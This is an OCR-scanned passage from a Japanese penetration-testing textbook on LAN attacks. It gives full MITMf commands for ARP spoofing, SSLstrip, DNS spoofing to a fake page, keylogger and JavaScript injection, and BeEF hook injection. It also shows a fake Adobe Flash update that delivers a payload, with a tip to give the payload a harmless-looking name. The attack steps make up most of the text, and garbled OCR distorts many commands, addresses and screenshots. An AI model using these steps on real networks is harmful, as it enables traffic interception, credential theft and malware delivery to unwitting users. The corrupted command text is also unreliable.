最後 に 、 次 の コマ ンド で TP 転送 機能 を 止め ます 。 





486 | 第 2 部 | ハッ キン グ を 体験 する 


Poot 個 ka11:<# echo 9 > /proc/sys/net/ipv4/1p forward 


仮想 マシ ン の ネッ トワ ー ク 設定 に て 、 仮 想 LAN アダ プター の 割り 当て を 変更 し 
て も 、 ゲ スト OS 上 で IP アド レス を 確認 する と 正しい IP アド レス が 割り 当て られ 
て いな いこ と が あり ます 。 

例え ば 、 仮 想 LAN ア ダ プ ター の 割り 当て を ホス ト オ ン リー アダ プター か ら プ 
リッ ジア ダ プ ター に 変更 し て 、Kahi の 仮想 マシ ン を 起動 し まし た 。 と ころ が 、 次 の 
よう に 10002 (ホス ト オ ン リー ネッ トワ ー ク の IE アド レス ) の まま で す 。 こう 
いっ た と き に は 、dhclient コ マン ド で DHCP か ら 動 的 IP アド レス を 再 取得 し て く 
だ さい 。 


Poot 全 ka11 :<# ュ 和 †cConfTig eth9 
eth9: 和 †lags=4163<UP , BROADCAST , RUNNTNG , MULTITCAST> mtu 1599 
inet 19.9.9.2 netmask 255.255.255.9 broadcast 
19.9.9.255 ホス ト オ ン リー ネッ トワ ー ク の TP アド レス の まま 。 
( 略 ) 
root@ka11:<# dhc1ient -r eth の 
Poot 個 ka11 :<# dhclient eth9 新しい TP アド レス を 取得 する 。 
root 個 ka11 :< ユ 和 TcConf†1g eth9 
eth9: 和 †lags=4163<UP , BROADCAST , RUNNTNG,MULTTCAST> mtu 1599 
inet 192.168.1.4 netmask 255.255.255.9 broadcast 
192 .168.1 .255 LAN 内 の TP アド レス に な っ た 。 
( 略 ) 








廊 MITMf で 中 間 者 攻撃 する 


MITMf は 中 間 者 攻撃 を 支援 する フレ ー ム ワー ク で す 。 SSLstrip 攻撃 を 実装 し て 
お り 、 暗号 化 され た HTTPS/SSL を バイ パス し よう と 試み ます 。 
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免 MITMf の イン スト ー ル 

手動 で イン スト ー ル する 方 法 (24) も あり ます が 、Kali の 場合 は apt コ マン ド で 
イ ン スズ トー ル で き F 雪 
1)MITMf を イン スト ー ル する 

次 の コマ ンド で Kali に イン スト ー ル し ます 。 


root 同 ka11:<# apt 1nsta]1] mitmf 


②)MITMf が 正常 に イン スト ー ル され た こと を 確認 する 
イィ ンス トー ル 後 、 次 の よう に 入力 し て MITMf の ロゴ と 書式 の ヘル プ が 表示 され 
る こと を 確認 し ます 。 


Foot 個 ka11 : < mitmT 


@ MITMf に よる アク ティ フキ ャ プチ ャ 


実験 環境 は 、 arpspoof の と き と 同 じ も の と し ます 。 arpspoof の と き は 、 タ ー ゲ ッ 
ト 端 末 と ルー ター に 偽 の 情報 を 送る た め に 、2 回 コマ ンド を 実行 し まし た 。 さ ら 
に 、 手 動 で ITP 転送 機能 を 有効 に し まし た 。MITMf を 使う と 、1 つ の コマ ンド で ア 
クティ プ キ ャ プチ ャ を 実現 で きま す 。 


①MITMf を 実行 する 
MITMf を 次 の 書式 で 実行 し ます 。 


# mitmf -1i < イン ター フェ ー ス 名 > --arp --spoof --gateway | 
< ルー ター の rp アド レス > --target < ター ゲッ ト 上 端末 の rp アド レス > 


ここ で は 次 の よう に 入力 し まし た 。 -hsts オ プシ ョ ン な し だ と SSLstrip、 -hsts オ 


*24 : https//github.com/byt3bI33d3r/MITMIt/wik/Installaton 
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プシ ョ ン あ り だ と SSLstrip+ が 起動 し ます ( 図 6-54) 


root@ka11:<# mitmf -1 ethO --arp --spooFf --gateway 192.168.1.1 
--target 192.168.1.21 --hsts 


| 敵 是 ii ii 敵 較 
男 還 | 凍 是 | 較 | 一 国 一 還 還 問題 | 閣 一 一 
男 ] 男 呈 男 圏 | 圏 回 本 昌男 | 間 還 
回 | 回" 圏 圏 | 圏 圏 回 " 圏 較 一 
田 一 回 圏 圏 回 一 回 回 


剛昌 に EE I に L_」 L_JL_I 


1*] MTTMT v9.9.8 - "The Dark Side ' 

| _ SSLstrip+ v9.4 
| | SSLstrip+ by Leonardo Nve running 
| Spoof v9.6 

| | ARP spoofing enabled 


Serg1o-Proxy v9.2.1 online 
SSLstrip v9.9 by Moxie Marlinspike online 


Net-Creds v1.9 online 
_ MTTMT-APT online 
* Runn1ng on http ://127.9.9.1:9999/ (Press CTRL+C to qun† ) 
| HTTP server on1ine 
| _ DNSChef v9.4 on1ine 


| SMB server on1ine 


(通信 が 発生 する と ログ が 出力 され る ) 
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Fc Edit Vsw Scarrh Tcrminal Hclp 


図 6.54 MITMf の 実行 


MITMf 実 行 後に 、/proc/sys/net/ipv4/ip_forward ファ 
転送 機能 が 有効 に な っ て いま す 


Poot 個 ka11:<# cat /Droc/sys/net/1pv4/1p †orward 
1 


通信 を キャ ブチ ャ する 


Kali で Wireshark を 起動 し て 、 イ ンタ ー フ ェ ー ス に ethO を 


認 し ます ( 図 6.55) 


root 細 ka11 :<# wireshark & 





レ ま す ター ゲッ ト 増 末 と ルー ター 間 の デ チキ 
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町 回 <  @ | 還 | 台 QA * ゅ っ ea 同 置く Se 王 


Protocol ー 
ーーー 773 - ーー トン S9 .196 - 19・ <96 ーー イ ーー ー 21 HTTP ーーー・ 「 ITTP/ ユ > 1 2BG ー3 (Cext/C330 


6 T 

255 77. 904257206 192 166 .1 4 59 10 - 1 200 HTTP 669 GET 7SK1h/ DURT1K1_032. CSS.Dhl 

| 9312 774.971316952 59.196.39.268 192.168.1.4 HTTP 893 HTTP/1 .1 269 OK (tmxt/css) 

| 59321 774 .972549698 59.196.19.268 192.168.1.21 HTTP 485 HTTP/1 .1 29 OK (text/css) 
59529 775.778219534 77.234.45.63 192 .168.1.4 HTTP 697 HTTP/1.6 266 OK (applicatlon, 
59536 775.788927495 77.234.41.23 192.168.1.21 HTTP 546 HTTP/1 .1 2B8 OK (anplicatinon, 
595.41 了 775 .8B22099655 392.436H .1 .21 77 .234 . 41 .23 HTTP 356 GET /R/A3qKIDJ]MDUxZTA3Z1B1ZTt 
59599 776.196332326 192.168.1.4 77 .234 .45 .63 HTTP 387 GET /R/A3GKIDJ]MDUxZTA3Z1B1ZTI- 


〉 FramE 5829B: 583 bytes on wire (4664 hits), 5B3 bytes CaDtured (4664 bits) on interface B 

> Ethernet TI, Src: wistronr_e3:9b:96 (f@:de:f1:e3:9b:96), Dst: PcsComDu_2f:65:44 (6:9B:27:2f:85:44) 
*> Interet PrOt0CO1 VerSion 4, SrC: 192.168.1.21, DsSt: 59.186.19.268 

, Trahsriss1pn Contro] Protocol。 SrC POrt: 6398H, Dst Port: 8B。 Seq: 3。 Ack: 3 Len: 529 

ま 


68 9 27 2f 85 44 f6 de ft e3 9b 96 68 69 45 96 

92 39 4d 5b 4B GOB 8B GB 9aA 74 CO a&B HB1 15 3b Ga 

313 c8†6 68 9B 59 ef @7 12 e2 bc 21 Bf f4 59 38 ーー ・-- 8・-P- 

46 29 26 Se 9B 06 47 45 54 29 2f 73 6b 69 66 2f  @) ? GE T /Sk1in/ 
| 7975 6b 6977696D69 5f 5657 73 32 2e 63 73 73 Duk1w1k1 _gS2.cCSS 


Hypcrtcxt Transfer Protoco Protocot Pasckets: 52361 Displayed: 544 (1.0%) 





図 6.55 ター ゲッ ト 端 末 と ルー ター 間 の デー タ が キャ プチ ャ され て いる 


MITMf は SSLstrip や SSLstrip+ (SSLstrip2) を 起動 し ます 。 こ れ ら は SSLStrip 
攻撃 を 行う ツー ル で す 。 SSLstrip 攻撃 と は 、HTTPS の アク セス を HTTP に 置き 換 
えて 、 平 文 で 通信 させ る 攻撃 で す 。 し か し 、 現 在 は 対策 が と られ て お り 、 残 念 な 
が ら SSLstrip 攻撃 は 通用 し な く な っ て いま す ("25)。 そ の た め 、 HTTPS 通信 は 暗 
号 化 され た 状態 で その まま キャ プチ ャ され て いま す 。 

SSLstrip 攻撃 が 有効 だ っ た 時 代 に は 、 HTTPS 通信 を 盗聴 する だ け で な く 、https 
の 認証 ペー ジ の Cookie を 奪取 し て セッ ショ ン ハ イジ ャ ッ ク な ども 実現 で きま し た 
("26) 。 


*25 : SSLstrip 攻撃 を 防ぐ 1 つの 方 法 と し て 、 HSTS (HTTP Strict Transport Security) が あり ま 
す 。 サ ー バ ー が HSTS を 利用 し て いる と 、 攻 撃 者 が URL を 書き 換え て も プラ ウザ が 強制 的 に 
HTTP か ら HTTPS に 戻し て し まい ます 。 結果 と し て 、SSLstrjp 攻撃 に 失敗 し ます 。 今後 の バー 
ジョ ン ア ッ プ で 、 こ の あたり の 課題 が アク リア され る こと を 期待 し まし ょ う 。 


*26 : ferret-sidejack や hamster を 使っ て Cookie を 奪取 で きま す が 、 認証 デー タ を 含む Cookie の ほ 
と ん ど は HTTPS 上 に ある た め 取 得 で き な い の が 現状 で す 。 
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③MITMf を 終了 する 
終了 する 場合 に は [Ctrl] + [c] キー を 押し ます 。 す る と 、 指 定 し た 2 つの 端 
未 に 、 元 に 戻す パケ ッ ト が 送信 きれ ます 。 そ し て 、 TP 転送 機能 も 無効 に な り ま す 。 


root 條 ka11:<# Cat /proc/sys/net/1pv4/1p Torward 
9 


"You do not have a working installation of the service_ 
identity module" 警告 の 解消 


MITMf の 起動 時 に 、 次 の よう な メッ セー ジ が 表示 され る こと が あり ます 。 


You do not have a working installation of† the service_1dent ュ ty 
module: "cannot 1mport name opentype'. Please nstal1 1 from 
<https : / / pypi . python . org/DpyDp1/serv1ce 1dentity> and make sure al11 
of† its dependencies are satisfied. Mithout the service identity 
module and a recent enough pyOpenSSL to support トモ 上 , Twisted can 
perform only rudimentary TLS client hostname verification. Many 


valid certificate/hostname mappings may be re]ected. 


これ が 出 た 状態 で も アク ティ プ キ ャ プチ ャ は 実行 され て いま す が 、 こ の メッ 
セー ジ を 消し た い 場 合 に は 次 の コマ ンド を 試し て みて くだ さい 。 


Poot 條 kal1 :< DiD 1nstal]1] -U service 1dent ュ ty 
Poo て 人 ka11 :># Dip 1nstal11 -U pyasn1 


介 DNS スプー フィ ング 


DNS スプ ー フ ィング と は 、 DNS へ の URL の 問い 合わ せ に 対し て 、 偽 の 情報 を 答 
えさ せる 攻撃 で す 。 結果 と し て 、 タ ー ゲ ッ ト 端 末 を 偽 の サイ ト に 誘導 で きま す 。 
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MITMf は DNS スプ ー フ ィング を サボ ポート し て いる の で 、 実 験 し て み ま す 。 ネ ッ 
トワ ー ク 構成 は アク ティ ブ プ キ ャ プチ ャ の 実験 と 同じ も の と し ます 。 


① 偽 サイ ト を 作成 する 
Kali 側 で index.html ファ イル を 作り 、"/var/www/html ディ レク トリ に 配置 
し ます 。 


ォ オリ ジ ナ ル の ファ イル を 退避 する 


mindex .html を 作成 し 直す 





"index .htm1" フ ァイル 





Apache を 起動 し ます 。 





Firefox で http://192.168.1.4 に アク セス し て 、 そ の Web ペー ジ が 表示 され る こと 
を 確認 し ます ( 図 656)。 
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[ 


図 6.56 Web ペ ー ジ の 表示 を 確認 する 


①⑩ | 192.168.1.4 | で AScarch 。 症 凌 昌 





②MITMf の 設定 ファ イル を 編集 する 
MITMf の 設定 ファ イル ("/etc/mitmf/mitmficonf') を 編集 し ます 。 





Leafpad の メニ ュー の 「Options」 > 「Line numbers] に チェ ッ ク を 入れ て 、 行 
番号 を 表示 し ます 。 次 の よう な 1 行 を 追加 し ます 。 「=」 の 左 の ホス ト に アク セス し 
た と き に 、 右 側 の IP アド レス に 飛ば す た め の 設定 に な り ま す 。 


"/etc/mitmf/mitmf .conf" フ ァイル (編集 前 ) 49 行 目 辺 り 





3③ DNS スプー フィ ング を 実行 する 
DNS スプ ー フ ィング を 実行 する 際 の MITMf の 書式 は 、 次 の 通り で す 。--dns オ 
プシ ョ ン を 追加 する だ け で す 。 
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# m1tmf -1 < イン ター フェ ー ス 名 > --arp --spoof --gateway < ルー ター。」 
の TP アド レス > --target < ター ゲッ ト 端 末 の rp アド レス > --dns 


ここ で は 次 の よう に 入力 し まし た 。 


root@ka11:<# m1tmf - ュ 1 ethO --arp --spoof --gateway 192.168.1.1 .」 
--target 192.168.1.21 --dns 


| 敵 還 ii ii 詳 較 
還 還 | 還 題 | 較 | 一 国 一 症 題 」 凍 題 | 閣 一 一 
回 男 呈 画 圏 | 回 回 画題 | 画 | 間 是 
回 | 回" 較 圏 | 圏 圏 丁 圏 圏 一 
田 | 一 回 圏 | 回 圏 一 田 較 | 


ーー に ーー ーー に 







*] MTTMfT v9.9.8 - "The Dark Side ' 
Spoo† v9.6 


DNS spoofing enabled DNS スプ ー フ ィング が 有効 に な っ た 。 


旧 
| ARP spoofing enabl1ed 





Serg1o-Proxy v9.2.1 online 


SSLstrip v9.9 by Moxie Marlinspike online 


Net-Creds v1.9 online 
MTTIMT-APT online 
* Runn1ng on http : //127.9.9.1:9999/ (Press CTRL+C to qun†) 


Error Sstartng HTTP server: [Errno 98] Address already 1n use 


[ 
に 
| 
| 
| 
時 
過 
| 
只 
較 
| HTTP server on1ine 


| DNSChef v9.4 on1ine 


| SMB server on1ine 
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$ め ター ゲッ ト 上 端末 か ら サ イト に アク セス する 

ター ゲッ ト 端 末 (Windows 7) で プラ ウザ を 起動 し て 、 http://www.akademeia. 
info に アク セス し ます 。 す る と 、evil page と いう ペー ジ が 表示 され まし た 。 図 6-57 
の URL と 表示 内 容 を 確認 し て くだ さい 。 


cz 受 人 ト レイ - ipemairon@ の orma 


> 時 M (し ラ 仙 ⑥ http//www.akademeainfo/ マ 日 Q Google で 靖 素 マ 1 CD の 1 
CTF 回 マーク バー 5 アウ テ ブ 回 この 5 の ブッ クマ .。 開 SBEEH 寺 P sitRGB.。 区 Cvevew|Ada。 [) 矢 職 ケー カラ 。 。 か 


eVll Dade 


6 
口 
ロ 
と 


[H @ 加 


キ 





図 6-57 evil page が 表示 され た 


MITMf の ログ に は 、 ア クセ ス が あっ た タイ ミン グ で 次 の よう に 出力 され ます 。 


2918-98-13 19:11:57 127.9.9.1 [DNS] Cooking the response of | 
type "A' for www.akademeia.info to 192.168.1.4 

2918-98-13 19:11:57 192.168.1.21 [type :Viva1di - 1 os:Mindows] .」 
www . akademea . info 

2918-98-13 19:11:57 192.168.1.21 [type :Viva1di-1 os:Mindows] | 


www . akademe1a. inTo 


今回 は 偽物 と わか りや すい Web ペ ー ジ に アク セス させ まし た が 、 本 物 そ っ くり 
の ペー ジ で パス ワー ド を 入力 させ た り 、 ペ イロ ー ド を ダウ ン ロ ー ド させ た りす る 
こと に 応用 で きま す 。 
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⑤ DNS スプ ー フ ィング を 終了 する 

実験 が 終了 し た ら 、 [Ctrl] + [c] キー を 押し ます 。 再び ター ゲッ ト 端 末 で http:// 
www.akademeiamfo に アク セス し て 、 本 当 の ペー ジ が 表示 され る こと を 確認 し ま 
す 。 


借 その 他 の テク ニッ ク 
MITMf に 備わっ て いる プラ グイ ン を 使っ て 、 様 々 な 攻撃 を 実現 で きま す 。 





画像 を 送 さ に する (Upsidedownternet プ ラグ イン ) 





表示 され る 画像 を 逆さ に し ます 。 


ブラ ウザ の 表示 を スク リー ン シ ョ ッ ト で 撮る (ScreenShooter プ ラグ イン ) 





"var/log/mitmf ディ レク トリ に スク リー ン シ ョ ッ ト の 画像 が 保存 され ます 。 


キー ロガー を 仕込 む (JSKeyLogger プ ラグ イン ) 





クラ イア ント が 表示 する Web ペー ジ に 、 avaScript の Keylogger を 注入 し ます 。 
"Keys:-" と いう 形 で ログ に 流れ ます 。 フ ァイル に 出力 し た けれ ば 、「>> /root/ 
Desktop/keylog.txt] と リダイレクト し ます 。 
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Code Injection (Inject プ ラグ イン ) 


# mitmf -1 < イン ター フェ ー ス 名 > --arp --spoof --gateway 
< ルー ター の TP アド レス > --target < ター ゲッ ト 端 末 の rp アド レス > .」 
--in]ject --]js-file <.js ス クリ プ ト の パス > 

# mitmf -1 < イン ター フェ ー ス 名 > --arp --spoof --gateway ・-」 
< ルー ター の rp アドレス > --target < ター ゲッ ト 上 端末 の rp アド レス > .」 
--inJject --]s-ur1 "<.js ス クリ プ ト の URL>" 

# mitmf -1 < イン ター フェ ー ス 名 > --arp --spoof --gateway 

< ルー ター の TIP アド レス > --target < ター ゲッ ト 端 末 の rp アド レス > .」 
--1n]ect --]s-payload "<JavaScript コ ー ド >" 


JavaScript ま た は HTML を Web ペー ジ に 注入 し ます 。 

* -jS-fiile また は -htmlfile で ロー カル ファ イル を 適用 する 。 
例 : |「--]js-file /root/Desktop/evi1 . ]s」 

* -jS-url ま た は -htmlurl で オン ライ ン の ファ イル を 適用 する 。 
例 : 「[--js-ur1 http ://192.168.1.4:3999/hook. ]s」 

* -jS-Dayload また は -htmLpayload で 指定 し た 命令 を 適用 する 。 
例 : |--]js-pay1oad "alert( 'test" )"] 


BeEF に よる 攻撃 の 多様 化 

BeEF は プラ ウザ に 焦点 を 当て た ペ ネ ト レー ショ ン ツ ー ル で す ("27)。BeEF を 
呼び 出す コー ド を ター ゲッ ト 上 端末 の プラ ウザ に 実行 させ る こと で 、 多 種 多様 な 攻 
豆 を 実現 し ます 。BeEF は Kalii に デフ ォ ル ト で イン スト ー ル され て いま す 。 


氏 初め て の BeEF 
BeEF の 実験 を 行い ます が 、 ネ ットワーク 構成 は アク ティ ブ キ ャ プ チャ の 実験 
と 同じ も の と し ます 。 


1) BeEF を 起動 する 
Kalii に て 、 ラ ンチ ャ ー か ら BeEF ( 牛 ア イコ ン ) を 起動 し ます 。Terminal が 起動 


*27 : https://beeftprojectcom/ 
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し て 、 Opening Web UI と 表示 され 、 カ ウン ト ダ ウン が 開始 され ます ( 図 6-58) 


これ が 終了 し て プロ ンプ ト が 返っ て きた ら 、BeEF が 完全 に 起動 し まし た 


root(Q)kali: < 


Flle EdiLt View Search Terminal Help 


You mght need to refresh your browser once 1t open5. 


| 
| 
*] Web UI: httD: //127.90.9.1:3999/U1/panel 
] Hook : <SCrLDt srcC="httD://<TP> : 36009/hook . ] 5"></5CTF1Dpt> 
] EXamDLUe: <SCFLDt SFC="httD://127.0.06.1:3096/hook . ] 5 "っ </sCF1Dt> 
DeG† - XS55.SeFV1CG LSB: BeEF 
LOaded: Loaded (/etc/1n1t .d/beef-xXS5: enhETated) 
act1Ve (FUhh1nd ) S1nCe Sun 2018-08-12 1/:12:13 JST: 55 aqo 
man: SYstemd- SsySV- eneratOr(8) 
6279 FXxXECStart= ニ /etC/1nmnit .d/bD=Ef-xs5 starFt [COde=exited., status=0/SUCC 
2353) 
MEIOTFV: ・ 
LGFOUD: / | 記 もの CDGS ま ェ XSS.SeGFV1CG 
7uUS『F/Share/beef- xsS/beecf 


Aud 12 1/:12:13 Kat1 syStemd[1] : Start1nQ LSB: BeE ヒ F . . . 
Auq 12 17:12:13 kal1 systemd[11: Started LSB: BeEF. 


|*| Openinq Web UL (httD://127.9.0.1:3090/u1/panet) 1n: 





6-58 BeEF 起 動 時 の Terminal 


2) BeEF の コン トロ ー ル バネ ル を 開く 


Firefox を 起動 し て 、 0 127.0.0.1:3000/u/panel に アク セス し ます 。 BeEF の 


認証 画面 が 表示 され る の で 、 ユ ー ザ ー 名 に beef 、 パ スワ リー ド に beef を 入力 し 
ます 。 す る と 、 コ ント ロー ル パ ネ ル が 表示 され ます ( 図 6-59) 
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を 三幸 ④③Flrefox を 立ち 上 げ 、BeEF の 
し て 、 ロ グ が 表示 され ます 。 ーーーーーーー ュ スー オル 







人 あ 和 も る 和博 合 
mw WP Ni Cm = tm mw Nrdammr WPm nmm る mmm Prmt 


⑤beef/beef で 
ログ イン し ます 。 


ie mW vwmw_ kmmiw inwmw パ ! 





人 必 $ @ G 柏 
NPri emw ツ シ 時 mm ロタ や TTP mmm mm 


ず ht hh | mw iamww 


で P ル ョ ピア は と まる トリ コード 
し ば らく 待ち ます 。 


① ラ ンチ ャ ー か ら 
⑥ ロ グイ ン す る と 、 
に に コネ オリ 時 まき. 内 = ョ ビラ | リム A と すげ 
が 表示 され ます 。 


6-59 BeEF の 起動 


3 ぅ ターゲット 端末 で BeEF の JavaScript を 実行 させ る よう に する 

Terminal か ら 次 の よう に 入力 し て 、 MITMf で 中 間 者 攻撃 し ます 。 さ ら に 、 タ ー 
ゲッ ト 端 末 が Web ペ ー ジ を 開い た と き に BeEF の TavaScript コー ド を 実行 きせ ま 
す 。-jsS-url オ プシ ョ ン に http://<Kaii の IP アド レス >:3000/hookjis を 指定 し ます 。 
これ に より 、BeEF の 攻撃 が プラ ウザ に 対し て 送ら れ ま す . 


root@ka]11i:<# mitmf -i eth9 --spoof --arp --gateway 192.168.1.1 | 


--target 192.168.1.21 --in]ject --]s-ur1] http: //192 .168.1.4:。」 
3999/ hook . ]s 


ター ゲッ ト 端 末 が 開い た Web ペ ー ジ に て 、 ソ ー ス を 確認 する と 
JavaScript が 埋め 込ま れ て いる こと が わか り ま す ( 図 6-60)。 


こ の 


No 上 得 
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<diy clsss= 和 coter-uter- の ツ 
< に Bleg Gommnn Fnntsf ーー><dlv 19= fnnter ><P>Pouered Dy <a nref=htto://blog-| lyednar-co/" 1| 
ITY 
プ </Miv> 
9 1 お Tag アー><script Lypg= "text/javascriEL > 
UmCt 
var trad = documart -cresteElemant (“ りり tram-type = taxt/jaysscript ": traq.asymc = 【rue: 
re src = http:/L.bl cg.ivedoor.jp 
E S ニ OOCuIIBWt. BE gy Tl [0 S-parenthode.InsegrtBefpre(trad。S): 
</scr ip> 
く IHOSCTIBL> 


く [mmg al に "traq sr に "Http:/ 旧 -blOg-liyadonr -jB/u.gi 7 必 
j </mosrr int) 


く |ーー // add Bodz Tag - - 
く SCTIRL SrC= hie:/7192。166.1.4:3000/ 悦 .Js" Lype= texl/javascrit ラ </scrlpLXX/body 
| ILI 





図 6.60 ソー ス に 埋め 込ま れ た 


な お 、 タ ー ゲ ッ ト 端 末 が 日 本 語 サ イト に アク セス する と 、Web ペ ー ジ が 文字 化 
け す る こと が あり ます 。 


④BeEF で 攻撃 する (勝手 に 音楽 を 鳴ら す ) 

BeEF の コン トロ ー ル パネ ル の 左側 の |Hooked Browsers| の |「Online 
Browsers」 に 、 タ ー ゲ ッ ト 端 末 の IP アド レス が 表示 され ます 。 これ を 選択 し 、 
[Commands」 タプ を 選び ます 。 こ こ か ら 様 々 な 攻撃 を 実行 で きま す 。 今回 は 初め 
て な の で 、 タ ー ゲ ッ ト 端 末 で 音楽 を 鳴ら す と いう 悪戯 を 実行 し て み ま す 。 | Module 
Tree」 で 「Browser」 > |Play Sound] を 選び ます 。 右側 の |Play Sound」 の と 
ころ に 、 音楽 ファ イル を セッ ト し ます 。|Sound File Path] に あら か じ め http:// 
0.0.0.0:3000/demos/sound.wav が セ モット され て いま す が 、 こ れ は ダミ ー で す 。 

音楽 ファ イル の 存在 する URL し が わか れ ば 、 そ れ を 指定 し て も よい で し ょ う 。 こ 
こ で は 、OnlineVideoConverter (https://www.onlinevideoconverter.com/) と い 
う オ ン ラ イン 動画 変換 サー ビス を 利用 し ます 。 YouTube の URL か ら 音 楽 フ ァイル 
を 抽出 で きま す 。 こ こ で は 、 適 当 な 動画 の URL し か ら wav フ ァイル を 生成 し ます 。 
ダウ ン ロ ー ド し 終え た ら 、 次 の よう に し て 適切 な 場所 に 配置 し ます 。 


root@ka11:<# mv /root/Down1oads/< フ ァイル 名 >.wav sound .wav 
Poo て 仙 kKa11:<# CD Sound.wav /usr/share/beef†f-xss/extensions/demos/ 
htm1 


準備 は で きま し た 。「Sound File Path]」 に http://<Kali の IP アド レス >:3000/ 
demos/sound.wav を 入力 し て か ら 、[Execute] ボタ ン を 押し ます ( 図 6-61)。 
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図 6.61 「Play Sound]」 を 実行 する 


する と 、 タ ー ゲ ッ ト 端 末 (Windows 7) の プラ ウザ で 指定 し た 音楽 が 鳴り 響き ま 
す 。 も し ファ イル 名 を 変更 し た い 場 合 は 、“/usr/share/beefLxss/modules/browser/ 
play_sound/modulerb' フ ァイル を 編集 し ます 。 

実験 の 流れ を まとめ る と 、 図 662 の よう に な り ま す 。 


無線 LAN 中 継 器 AP 
《》 一 三 __ し と 







192.168.1.1 


192.168.1.21 


Windows 7 
(ター ゲッ ト 上 端末 ) 


図 6.62 BeEF の 実験 の 流れ 
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5)BeEF を 停止 する 
ター ゲッ ト 端 末 が ペー ジ を 閉じ る まで 、 攻 撃 を 引き 続き 実行 で きま す 。BeEF は 
サー ビス と し て 稼働 し て いる の で 、 止 め る 場合 は 次 の よう に 実行 し ます ("28)。 


Poot@Qka11:<# serv1ce bee†-xss stop 


BeEF は 非常 に 多 機能 で 、 そ の 他 に も 色々 な 攻撃 が で きま す 。 吉 戯 レベ ル の も の 
か ら 本 格 的 な レベ ル の も の まで あり ます 。 


* 特定 の URL し に リダイレクト : フィ ッ シ ン グ サ イト や ペイ ロー ド の ダウ ン ロ ー ド 
ペー ジ に 強制 的 に ジャ ンプ させ る 。 

* 訪問 し た URL や ドメイン の 表示 

s Web カ メラ 

* Google アカ ウン ト が 保持 し て いる 連絡 帳 を 入手 

s プラ ウザ の スク リー ン シ ョ ッ ト 


以 隆 で は BeEF を 使っ た テク ニッ ク を いく つか 紹介 し ます 。 


人 偽 の Adobe Flash の アッ プ デ ー ト に より ペイ ロー ド を タダ ウン ロー ド さ せる 


Meterpreter セ モッ ショ ン を 確立 する に は 、 次 の 2 段階 を 突破 し な けれ ば な り ま せ 
で bo 


1. ター ゲッ ト 上 端末 の 操作 者 に ペイ ロー ド を 実行 きせ る 。 
2. アン チ ウ イル ス に よる ウイ ルス 検知 を 回 避 す る 。 


2 に 関し て は 、Veil や バイ ンド と いっ た 隠蔽 化 で 回 避 で きる こと を 解説 し まし 
た 。 し か し 、1 に つい て は まだ 解説 し て いま せん 。 こ こ で は 、BeEF と MITMf を 活 
用 し て 、 操 作者 に ペイ ロー ド を 自然 に ダウ ン ロ ー ド させ る こと を 目標 と し ます 。 


28 : BeEF を 止め て も 、 タ ー ゲ ッ ト 端 末 に は BeEF の コー ド が 挿入 きれ た まま な の で 、MITMf も 
停止 する 必要 が あり ます 。 





| 第 6 章 | LAN の ハッ キン グ 503 


1) タ ー ゲ ッ ト 端 末 で BeEF の JavaScript を 実行 させ る よう に する 
BeEF を 起動 し て 、 次 の コマ ンド を 実行 し ます 。 


root@ka11:<# mitmTf -1 eth9 --spoof --arp --gateway 192.168.1.1 .」 
--target 192.168.1.21 --in]ject --]s-ur1 http://192.168.1.4:。」 
3999/hook .]s 


② ペ イロ ー ド を 作成 する 

| Hooked Browsers」 に ター ゲッ ト 端 末 の IP アド レス が 表示 され まし た 。 

ター ゲッ ト 端 末 を 選択 し て 、[Detailsj」 タプ で プラ ウザ の 情報 を 確認 で きま す 。 
| Browser UA String] に 「USER_AGENT」 (プラ ウザ の 種類 や バー ジョ ン ) が 表 
示さ れ 、|Browser Platiorm」 か ら OS の 種類 (Win32 な ど ) が わか り ま す 。 こ う 
し た 情報 か ら 、 適合 する ペイ ロー ド を 作成 し ます 。 そ の 隊 、 ペ イロ ー ド の LHOST 
は 、 こ の 実験 に 合う よう な IP アド レス (ここ で は Kaii の IP アド レス で ある 
192.168.1.4) に する こと を 忘れ な いよ うに し ます 。 作成 し た ペイ ロー ド 名 は "evil 
exe と し ます C29)。 


3③ ペ イロ ー ド を 外部 か ら ア クセ ス で きる 場所 に に コピー する 

"evilexe ファ イル を 外部 か ら ア クセ ス で きる 場所 に コピ ー し ます 。 こ れ ま で 通 
り /var/www/html/share/evilexe に 配置 し て 、http://192.168.1.4/share/evil 
exe で アク セス で きる よう に し ます 。 


④) 偽 の Adobe Flash Update を 実行 する 

BeEF に て 、 タ ー ゲ ッ ト 端 末 を 選択 し ます 。「Commands] タブ の 「Module 
Tree」 に て |Social Engineering」 > IFake Flash Update」 を 選び ます 。 次 の 3 つ 
の 項目 を 設定 する 必要 が あり ます 。 


* Image に Adobe Flash の アッ プ デ ー ト の 偽 画像 の URL を 指定 する 。BeEF に は 


29 : 実験 な の で この ファ イル 名 で す が 、 本 来 で あれ ば ぱ 人 し く な い フ ァイル 名 に し ます 。 例え ば 、 
"patch.exe"、'Hlash update.exe" な ど と し ます 。 
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/uSr/share/beef-xss/extensions/demos/html/adobe_flash_update.png に 偽 画 
像 が 用 意 き れ て いる 。 これ は http://192.168.1.4:3000/demos/adobe_flash_ 
updatejpng で アク セス で きる 。 実際 に Firefox で アク セス で きる こと を 確認 し 、 
確認 で きた ら 、1Image に "http://192.168.1.4:3000/demos/adobe_flash_update. 
png を 指定 する 。 

* Payload に は 、Custom_Payload を 選択 する 。 

s Custom Payload URL に は 、 ペ イロ ー ド ファ イル の URL を 指定 する 。 こ こ で は 、 
http://192.168.1.4/share/evilexe を 指定 し た 。 


設定 が 完了 し た ら 、[Execute] ボタ ン を 押し ます ( 図 6-63)。 
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⑤ 攻 撃 の 履歴 が 





表示 され ます 。 





マオ 時: さ . 戸 


4 その re 電 | だ 1 で 3 コ EF は 
<EK ゴ を 選択 し ます 。 ln 


Parad- |Caston_Payos| マ 





5a の URL を 指定 し ます 。 
| _? 還 | 

eineew | ら eew ーー 

④ [Execute] ボタ ン を 押す と 、 


攻撃 が 実行 され ます 。 


図 6-63 「Fake Flash Update」 の 設定 


5. ター ゲッ ト 端 末 で 偽 の アッ プ デ ー ト を 承諾 する 

ター ゲッ ト 端 末 の プラ ウザ 上 に 、 偽 の Adobe Flash の アッ プ デ ー ト 画面 が 表示 
され ます ( 図 6-64)。 操 作 者 が [INSTALL] ボタ ン を 押す と 、"evilexe'" ファ イル 
が ダウ ン ロ ー ド され ます 。 こ の 段階 で は 実行 まで 行わ れ ま せん 。 





| 第 6 章 | LAN の ハッ キン グ 505 


AT upP2ehi lo AG お = ト 1kh か Tyr we eDb 
The wrote mocoe 


ーー ニー VOpo PSVOrmeroe moOh、 IFNY PR や mt 
* ICOWed pmwfomwWCe WJ 0 now miy 


『 
e Blcurmiy erNenoerments eocr 1 滞っ いき - 中 | | 


